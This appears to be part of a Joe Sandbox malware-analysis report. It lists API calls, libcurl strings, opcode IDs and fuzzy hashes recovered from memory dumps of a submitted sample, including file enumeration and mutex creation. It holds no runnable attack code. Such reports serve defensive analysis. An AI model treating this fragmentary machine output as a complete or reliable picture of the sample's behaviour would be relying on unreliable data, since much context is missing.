                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_strnequal
                                                                                                                                  • String ID: NTLM$NTLM auth restarted$NTLM handshake failure (internal error)$NTLM handshake rejected
                                                                                                                                  • API String ID: 482932555-2258391893
                                                                                                                                  • Opcode ID: 2c9a02d89f49a812ca40a75f805383508c25966e4a3de9ff475dd1bdea028030
                                                                                                                                  • Instruction ID: 972ef69bceb89d7b186979da053386976bb5f94421d155df2dc1a8b90e634bc6
                                                                                                                                  • Opcode Fuzzy Hash: 2c9a02d89f49a812ca40a75f805383508c25966e4a3de9ff475dd1bdea028030
                                                                                                                                  • Instruction Fuzzy Hash: B7214676A102152BEB005E78FC41B9A7BA9EF8236DF104862EC58C7102E73AE525C7B0
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6B92C475,?,?,6B92C43D,?,00000000,?), ref: 6B92C4D8
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6B92C4EB
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,6B92C475,?,?,6B92C43D,?,00000000,?), ref: 6B92C50E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                  • Opcode ID: a9f05af97df452de3075437b4a7383406e32c79c80a7fe582bcc9ecdcee8538f
                                                                                                                                  • Instruction ID: bfeb4f5150cd86e171adb5982f753a504bc1793e41dfa6fa9910532b79ad38bd
                                                                                                                                  • Opcode Fuzzy Hash: a9f05af97df452de3075437b4a7383406e32c79c80a7fe582bcc9ecdcee8538f
                                                                                                                                  • Instruction Fuzzy Hash: EEF01C31919518FBDF11AB91CA09F9E7F78EB46759F1041A4A811A2151DB78CF01DBA0
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 6B935E65
                                                                                                                                    • Part of subcall function 6B92F7EA: RtlFreeHeap.NTDLL(00000000,00000000,?,6B935EE0,6B9538A0,00000000,6B9538A0,00000000,?,6B935F07,6B9538A0,00000007,6B9538A0,?,6B93532A,6B9538A0), ref: 6B92F800
                                                                                                                                    • Part of subcall function 6B92F7EA: GetLastError.KERNEL32(6B9538A0,?,6B935EE0,6B9538A0,00000000,6B9538A0,00000000,?,6B935F07,6B9538A0,00000007,6B9538A0,?,6B93532A,6B9538A0,6B9538A0), ref: 6B92F812
                                                                                                                                  • _free.LIBCMT ref: 6B935E77
                                                                                                                                  • _free.LIBCMT ref: 6B935E89
                                                                                                                                  • _free.LIBCMT ref: 6B935E9B
                                                                                                                                  • _free.LIBCMT ref: 6B935EAD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6B8D6970: inet_pton.WS2_32(00000002,?,?), ref: 6B8D699A
                                                                                                                                    • Part of subcall function 6B8D6970: inet_pton.WS2_32(00000017,?,?), ref: 6B8D69AB
                                                                                                                                  • inet_pton.WS2_32(00000002,?,?), ref: 6B8D5CC3
                                                                                                                                  • inet_pton.WS2_32(00000017,?,?), ref: 6B8D5CD2
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8D5D8E
                                                                                                                                  Similarity
                                                                                                                                  • API ID: inet_pton$___from_strstr_to_strchr
                                                                                                                                  • String ID: /
                                                                                                                                  APIs
                                                                                                                                  • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,6B8DD060,?,?,6B8DBEF5), ref: 6B8DCE4D
                                                                                                                                  Strings
                                                                                                                                  • FTP response aborted due to select/poll error: %d, xrefs: 6B8DCE54
                                                                                                                                  • We got a 421 - timeout!, xrefs: 6B8DCE70
                                                                                                                                  • FTP response timeout, xrefs: 6B8DCE98
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                  • String ID: FTP response aborted due to select/poll error: %d$FTP response timeout$We got a 421 - timeout!
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: CURL_SSL_BACKEND
                                                                                                                                  APIs
                                                                                                                                  • getsockname.WS2_32(BB830100,?,?), ref: 6B8DCB43
                                                                                                                                  • accept.WS2_32(?,?,00000080), ref: 6B8DCB6B
                                                                                                                                    • Part of subcall function 6B9006B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,6B8F6C24), ref: 6B9006EF
                                                                                                                                    • Part of subcall function 6B9006B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B90072F
                                                                                                                                    • Part of subcall function 6B8FA660: ioctlsocket.WS2_32(00000000,8004667E,6B8D4554), ref: 6B8FA67A
                                                                                                                                  Strings
                                                                                                                                  • Connection accepted from server, xrefs: 6B8DCBAB
                                                                                                                                  • Error accept()ing server connect, xrefs: 6B8DCB87
                                                                                                                                  Similarity
                                                                                                                                  • API ID: acceptcurl_msnprintfcurl_mvsnprintfgetsocknameioctlsocket
                                                                                                                                  • String ID: Connection accepted from server$Error accept()ing server connect
                                                                                                                                  APIs
                                                                                                                                  • curl_mvsnprintf.LIBCURL(?,00000801,00000000,6B8F6C24), ref: 6B9006EF
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B90072F
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_msnprintfcurl_mvsnprintf
                                                                                                                                  • String ID: ...$...
                                                                                                                                  APIs
                                                                                                                                  • curl_getenv.LIBCURL(CURL_SSL_BACKEND,?,?,?,6B91CB27,00000000,6B8E692E), ref: 6B91DA73
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_getenv
                                                                                                                                  • String ID: CURL_SSL_BACKEND
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6B90ACC0: GetModuleHandleA.KERNEL32(kernel32,?,00000002,6B90AEAE), ref: 6B90ACCE
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,InitSecurityInterfaceA), ref: 6B8D90FD
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                  • String ID: InitSecurityInterfaceA$secur32.dll$security.dll
                                                                                                                                  • API String ID: 1646373207-3788156360
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 6B934E87
                                                                                                                                  • _free.LIBCMT ref: 6B934EB0
                                                                                                                                  • SetEndOfFile.KERNEL32(00000000,6B92D700,00000000,?,?,?,?,?,?,?,?,6B92D700,?,00000000), ref: 6B934EE2
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,6B92D700,?,00000000,?,?,?,?,00000000,?), ref: 6B934EFE
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFileLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1547350101-0
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,6B9237F2,?,00000000,00000000,?,6B9284AA,6B928987,00000000,?,00000000), ref: 6B92F540
                                                                                                                                  • _free.LIBCMT ref: 6B92F59D
                                                                                                                                  • _free.LIBCMT ref: 6B92F5D3
                                                                                                                                  • SetLastError.KERNEL32(00000000,00000015,000000FF,?,6B9284AA,6B928987,00000000,?,00000000), ref: 6B92F5DE
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2283115069-0
                                                                                                                                  APIs
                                                                                                                                  • QueryPerformanceCounter.KERNEL32(6B8FF03B,?,6B8D669E,6B8FF03B,?,?,?,?), ref: 6B90E5E5
                                                                                                                                  • __alldvrm.LIBCMT ref: 6B90E5FE
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B90E627
                                                                                                                                  • GetTickCount.KERNEL32 ref: 6B90E642
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountCounterPerformanceQueryTickUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1296068966-0
                                                                                                                                  APIs
                                                                                                                                  • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,6B935102,00000000,00000001,00000000,00000000,?,6B92E891,?,6B9292EA,00000000), ref: 6B938616
                                                                                                                                  • GetLastError.KERNEL32(?,6B935102,00000000,00000001,00000000,00000000,?,6B92E891,?,6B9292EA,00000000,?,00000000,?,6B92EDE5,?), ref: 6B938622
                                                                                                                                    • Part of subcall function 6B9385E8: CloseHandle.KERNEL32(FFFFFFFE,6B938632,?,6B935102,00000000,00000001,00000000,00000000,?,6B92E891,?,6B9292EA,00000000,?,00000000), ref: 6B9385F8
                                                                                                                                  • ___initconout.LIBCMT ref: 6B938632
                                                                                                                                    • Part of subcall function 6B9385AA: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6B9385D9,6B9350EF,00000000,?,6B92E891,?,6B9292EA,00000000,?), ref: 6B9385BD
                                                                                                                                  • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,6B935102,00000000,00000001,00000000,00000000,?,6B92E891,?,6B9292EA,00000000,?), ref: 6B938647
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2744216297-0
                                                                                                                                  APIs
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8DAE35
                                                                                                                                  Strings
                                                                                                                                  • Can't get the size of %s, xrefs: 6B8DAF14
                                                                                                                                  • Can't open %s for writing, xrefs: 6B8DAE9E
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ___from_strstr_to_strchr
                                                                                                                                  • String ID: Can't get the size of %s$Can't open %s for writing
                                                                                                                                  • API String ID: 601868998-3544860555
                                                                                                                                  APIs
                                                                                                                                  • curl_url_set.LIBCURL(?,00000002,00000000,00000080), ref: 6B8E432A
                                                                                                                                  Strings
                                                                                                                                  • Couldn't find host %s in the .netrc file; using defaults, xrefs: 6B8E42FD
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_url_set
                                                                                                                                  • String ID: Couldn't find host %s in the .netrc file; using defaults
                                                                                                                                  • API String ID: 1103260265-3983049644
                                                                                                                                  APIs
                                                                                                                                  • curl_strnequal.LIBCURL(Set-Cookie:,00000000,0000000B,?,?,?,00000000), ref: 6B8D615B
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_strnequal
                                                                                                                                  • String ID: Set-Cookie:$none
                                                                                                                                  • API String ID: 482932555-3629594122
                                                                                                                                  • Opcode ID: 2bdd073c98a27b3f11a727c5208a5e46616abfdefe73630a4920c0a304b7cab5
                                                                                                                                  • Instruction ID: db35789820e6d1efa2b55edbd2d48798ea639d590d736132a5a0a896713f296b
                                                                                                                                  • Opcode Fuzzy Hash: 2bdd073c98a27b3f11a727c5208a5e46616abfdefe73630a4920c0a304b7cab5
                                                                                                                                  • Instruction Fuzzy Hash: 8551297594839D6AEF014A385C4679A3BA55F53308F0408FAED45AB243EB7EC949C372
                                                                                                                                  APIs
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000080,%ld%s,?,?), ref: 6B8D1C85
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000080,%ld%s,?,?), ref: 6B8D1D46
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_msnprintf
                                                                                                                                  • String ID: %ld%s
                                                                                                                                  • API String ID: 1809024409-3503459407
                                                                                                                                  • Opcode ID: bc3edf61d235dbd4d3631eed6764a4a49dc2892f0257a5c8b44c2bd3e31185ea
                                                                                                                                  • Instruction ID: 65968abc335cc98a5025f104e8d67b849862c9e98f2a878c1cfbe2a124ebaf90
                                                                                                                                  • Opcode Fuzzy Hash: bc3edf61d235dbd4d3631eed6764a4a49dc2892f0257a5c8b44c2bd3e31185ea
                                                                                                                                  • Instruction Fuzzy Hash: 95512774904614ABD725DF34CC41BE6B7F8FF05304F0049AAE99D87241DB39AA45CB60
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6B8E87E0: curl_msnprintf.LIBCURL(?,00000007,:%u,?,00000000,?,?,?,6B8E7CB2,?,?,?,00000106,?,00000000), ref: 6B8E8830
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000007,:%u,?,0000002A,?,?,?,?,?,00000000,00000000), ref: 6B8E88CF
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_msnprintf
                                                                                                                                  • String ID: :%u$Hostname in DNS cache was stale, zapped
                                                                                                                                  • API String ID: 1809024409-2924501231
                                                                                                                                  • Opcode ID: 98b5160f0095908b681c0388d14312494be196a8b2a341e937ed726249113643
                                                                                                                                  • Instruction ID: e55072de20bd82e6af3c513beaa810ea887f8f1167507c41ca63042c0e0a75b5
                                                                                                                                  • Opcode Fuzzy Hash: 98b5160f0095908b681c0388d14312494be196a8b2a341e937ed726249113643
                                                                                                                                  • Instruction Fuzzy Hash: E9412335E0021DABCB18DF38CC41AEEB779EF46308F0046E9D95953201DB35AA56CFA1
                                                                                                                                  APIs
                                                                                                                                  • curl_msnprintf.LIBCURL(6B952F90,6B953058,%s%s%s%s,6B93C4B0,6B948024,?,6B948020), ref: 6B91D84F
                                                                                                                                  • _strncpy.LIBCMT ref: 6B91D8AF
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _strncpycurl_msnprintf
                                                                                                                                  • String ID: %s%s%s%s
                                                                                                                                  • API String ID: 37059441-8588819
                                                                                                                                  • Opcode ID: 79a61b3e41befeab8c99d5f043d39b6d7db35ae77e52dbb63839e15371a4b097
                                                                                                                                  • Instruction ID: d652a57b2628074732b7d702bece78d1bac6bc5451209d0385452aa2c506002d
                                                                                                                                  • Opcode Fuzzy Hash: 79a61b3e41befeab8c99d5f043d39b6d7db35ae77e52dbb63839e15371a4b097
                                                                                                                                  • Instruction Fuzzy Hash: 0931C377B8C21D6BDB08CF689C91BAAB7A99F56284F1041FDEC09D7341D639DD0487A0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6B90E5D0: QueryPerformanceCounter.KERNEL32(6B8FF03B,?,6B8D669E,6B8FF03B,?,?,?,?), ref: 6B90E5E5
                                                                                                                                    • Part of subcall function 6B90E5D0: __alldvrm.LIBCMT ref: 6B90E5FE
                                                                                                                                    • Part of subcall function 6B90E5D0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B90E627
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8E40E3
                                                                                                                                  Strings
                                                                                                                                  • Too old connection (%ld seconds), disconnect it, xrefs: 6B8E40FF
                                                                                                                                  • Connection %ld seems to be dead!, xrefs: 6B8E415B
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$CounterPerformanceQuery__alldvrm
                                                                                                                                  • String ID: Connection %ld seems to be dead!$Too old connection (%ld seconds), disconnect it
                                                                                                                                  • API String ID: 3283211967-2324667105
                                                                                                                                  • Opcode ID: 0078b69b006eb42465e693d3b0dd3daa0d6ae98cf02f6c2a4ea9a19f8443144c
                                                                                                                                  • Instruction ID: b1cd85f1d7c524e4e2fb90b0e543928332fb16366510ec74599b63e62bb293d9
                                                                                                                                  • Opcode Fuzzy Hash: 0078b69b006eb42465e693d3b0dd3daa0d6ae98cf02f6c2a4ea9a19f8443144c
                                                                                                                                  • Instruction Fuzzy Hash: 05314071E042096BDB005E3C8C43B9A7764EFA732CF540654F82C672C2E779A4A583E1
                                                                                                                                  APIs
                                                                                                                                  • curl_slist_append.LIBCURL(00000000,Content-Type: application/dns-message,0000013C,00000000,00000440,?,00000000,00000000,?,6B8E8617,00000000,00000000,?,00000000), ref: 6B8FDB87
                                                                                                                                  • curl_slist_free_all.LIBCURL(?,?,?,?,?,?,?,?,?,?), ref: 6B8FDC0D
                                                                                                                                  Strings
                                                                                                                                  • Content-Type: application/dns-message, xrefs: 6B8FDB74
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_slist_appendcurl_slist_free_all
                                                                                                                                  • String ID: Content-Type: application/dns-message
                                                                                                                                  • API String ID: 2220803400-4173715026
                                                                                                                                  • Opcode ID: 98766c2aca1f01500c8e275308a9461cd4fe4c05639d837de7561fd136d96642
                                                                                                                                  • Instruction ID: 97504f55f87f67db0e7b3da6eda47b78c7d74dd0f51356cde298c664a310d652
                                                                                                                                  • Opcode Fuzzy Hash: 98766c2aca1f01500c8e275308a9461cd4fe4c05639d837de7561fd136d96642
                                                                                                                                  • Instruction Fuzzy Hash: A82105B2A40B04ABE7118F75EC41BE7B7EDFF05388F000819EA1E93251E33AA511CB90
                                                                                                                                  APIs
                                                                                                                                  • curl_strnequal.LIBCURL(?,?,6B8EC897,?,?,?,?,6B8ECC18,?,6B8EC897,?,?,6B8EC897,?,?,00000000), ref: 6B8ECB64
                                                                                                                                  • curl_strnequal.LIBCURL(HTTP/,?,00000005,?,?,?,?,6B8ECC18,?,6B8EC897,?,?,6B8EC897,?,?,00000000), ref: 6B8ECBA5
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_strnequal
                                                                                                                                  • String ID: HTTP/
                                                                                                                                  • API String ID: 482932555-2417072641
                                                                                                                                  • Opcode ID: 1fc6d372776b66832d28b515e02f9090e615568907879f73dce297540bd6911a
                                                                                                                                  • Instruction ID: 4f84e696ef58ededa9acdc05de39aa677326e17ca49147ce7c4cabe99a0a9fb8
                                                                                                                                  • Opcode Fuzzy Hash: 1fc6d372776b66832d28b515e02f9090e615568907879f73dce297540bd6911a
                                                                                                                                  • Instruction Fuzzy Hash: 0B113B37F042145FCB014E1C9C406AA77E6EBC7354B0949B9EC59DB203D635EC464BE0
                                                                                                                                  APIs
                                                                                                                                  • curl_easy_strerror.LIBCURL(00000000), ref: 6B8DC579
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_easy_strerror
                                                                                                                                  • String ID: Failure sending QUIT command: %s$QUIT
                                                                                                                                  • API String ID: 1399792982-1162443993
                                                                                                                                  • Opcode ID: 2ac8d6d1b80450f85c81fca1c4e7c75c2c269634486deeb7e6da1b738ca27821
                                                                                                                                  • Instruction ID: 86cb37390e07f611bc9890738c9c43ca8f6694ca326ece1a0e760e50aafab255
                                                                                                                                  • Opcode Fuzzy Hash: 2ac8d6d1b80450f85c81fca1c4e7c75c2c269634486deeb7e6da1b738ca27821
                                                                                                                                  • Instruction Fuzzy Hash: 1221F135548B50AAE7119B74C806B86BBF8BF0630CF00096AE45D97152DBBDF055CFA1
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _strstr
                                                                                                                                  • String ID: ;type=
                                                                                                                                  • API String ID: 2882301372-3507045495
                                                                                                                                  • Opcode ID: 02bcd200c3e7670c66d6a6a89d0672ad448ab23dc7f8109d9fe8ecac518ff21c
                                                                                                                                  • Instruction ID: 84a504961c900762ea8a339118b59a3a21352e3be18b7abf09bab65256f9d9b6
                                                                                                                                  • Opcode Fuzzy Hash: 02bcd200c3e7670c66d6a6a89d0672ad448ab23dc7f8109d9fe8ecac518ff21c
                                                                                                                                  • Instruction Fuzzy Hash: 4F1138B65443559ED720CF28D844781BFE4AB02368F04067BDC5D8F282C77AE9448BF1
                                                                                                                                  APIs
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000005,%c%03d,-00000041,?,00000000), ref: 6B8F07D2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_msnprintf
                                                                                                                                  • String ID: %c%03d$%s %s
                                                                                                                                  • API String ID: 1809024409-883683383
                                                                                                                                  • Opcode ID: 66330c2774ff32ce65df69676b1dd1c04a8a5ca91f68980ce30565f6f90a10e6
                                                                                                                                  • Instruction ID: 789d8811c692ced6fea5fea502288d5af5d3359aa3b595e6b434cf69ae8f2675
                                                                                                                                  • Opcode Fuzzy Hash: 66330c2774ff32ce65df69676b1dd1c04a8a5ca91f68980ce30565f6f90a10e6
                                                                                                                                  • Instruction Fuzzy Hash: B501F5B6A0411A7BD6099A34AC82FBBBB6EEF9535CF040015F90C57100EB79BA154EF2
                                                                                                                                  APIs
                                                                                                                                  • getsockopt.WS2_32(00004020,0000FFFF,00001001,00000000,00000004), ref: 6B8D343B
                                                                                                                                  • setsockopt.WS2_32(00004020,0000FFFF,00001001,00004020,00000004), ref: 6B8D3460
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: getsockoptsetsockopt
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 194641219-2726393805
                                                                                                                                  • Opcode ID: 9c2a1cfb3fa5761dc039398441e776cf5565babb61d5fbfaed65b39ad78d4e91
                                                                                                                                  • Instruction ID: fe9f02b321e7f071f8dada72e0f7464d5344d67058df2ed38663fc3539c06529
                                                                                                                                  • Opcode Fuzzy Hash: 9c2a1cfb3fa5761dc039398441e776cf5565babb61d5fbfaed65b39ad78d4e91
                                                                                                                                  • Instruction Fuzzy Hash: 5F01B57194820DBBEF21DF94DC46BAD7779EB11704F1041E1FA04AB2C1D7B9CA449B40
                                                                                                                                  APIs
                                                                                                                                  • curl_strnequal.LIBCURL(Digest,6B8EB74C,00000006,00000DD0,?,?,6B8EB74C), ref: 6B8ED8E6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_strnequal
                                                                                                                                  • String ID: Digest$t!
                                                                                                                                  • API String ID: 482932555-3305821177
                                                                                                                                  • Opcode ID: 6ecea6a13a530f72ea3c264dbe24b779f5c559db2d3342d90433c01d189164ae
                                                                                                                                  • Instruction ID: 56553660f77eb529cc8253e80c5949e9a1fa180d6cf8721ce846d3958447b5ff
                                                                                                                                  • Opcode Fuzzy Hash: 6ecea6a13a530f72ea3c264dbe24b779f5c559db2d3342d90433c01d189164ae
                                                                                                                                  • Instruction Fuzzy Hash: 58F0F657E4425822DB005969BC01BAA77DD4FD3258F0904B2EC9CD7242EA29E51AC7B0

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:18.8%
                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                  Signature Coverage:4.3%
                                                                                                                                  Total number of Nodes:138
                                                                                                                                  Total number of Limit Nodes:8

                                                                                                                                  Callgraph


                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • lstrcat.KERNEL32(?,0706501D), ref: 07065022
                                                                                                                                  • FindFirstFileA.KERNEL32(?,?,?,0706501D,?,?), ref: 07065036
                                                                                                                                    • Part of subcall function 07065046: lstrcmp.KERNEL32(?,07065044), ref: 07065047
                                                                                                                                    • Part of subcall function 07065046: lstrcat.KERNEL32(?,?), ref: 07065075
                                                                                                                                    • Part of subcall function 07065046: FindNextFileA.KERNELBASE(?,?,?,?,?,0706501D,?,?), ref: 0706509A
                                                                                                                                    • Part of subcall function 07065046: FindClose.KERNEL32(?,?,?,?,0706501D,?,?), ref: 070650B6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2514314002.0000000007065000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2514276987.0000000007000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514360900.0000000007084000.00000080.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514402330.0000000007088000.00000020.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514440851.0000000007089000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514477856.000000000708A000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514509989.000000000708B000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$Filelstrcat$CloseFirstNextlstrcmp
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1879274390-0
                                                                                                                                  • Opcode ID: 363fc8d663d25568fa4cb4694c18a05544d6f83d872a8b435be624afdb8b15d4
                                                                                                                                  • Instruction ID: 7f860c635f1bcd321706afb5ccf1234c72218eb1c633077988738b7c946680a9
                                                                                                                                  • Opcode Fuzzy Hash: 363fc8d663d25568fa4cb4694c18a05544d6f83d872a8b435be624afdb8b15d4
                                                                                                                                  • Instruction Fuzzy Hash: 9201C0F2904202AFCB216B74DC5CA8E7FF8EF15346B1206A1F206D2601EA78C9308F61

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • StrRStrIA.SHELL32(?,00000000,07065B95), ref: 07065BA1
                                                                                                                                  • lstrlen.KERNEL32(?), ref: 07065BAC
                                                                                                                                  • CreateMutexA.KERNEL32(?,?), ref: 07065BEC
                                                                                                                                  • lstrcmp.KERNEL32(?,07065C33), ref: 07065C3A
                                                                                                                                  • lstrlen.KERNEL32(?,?), ref: 07065CE4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2514314002.0000000007065000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2514276987.0000000007000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514360900.0000000007084000.00000080.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514402330.0000000007088000.00000020.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514440851.0000000007089000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514477856.000000000708A000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514509989.000000000708B000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
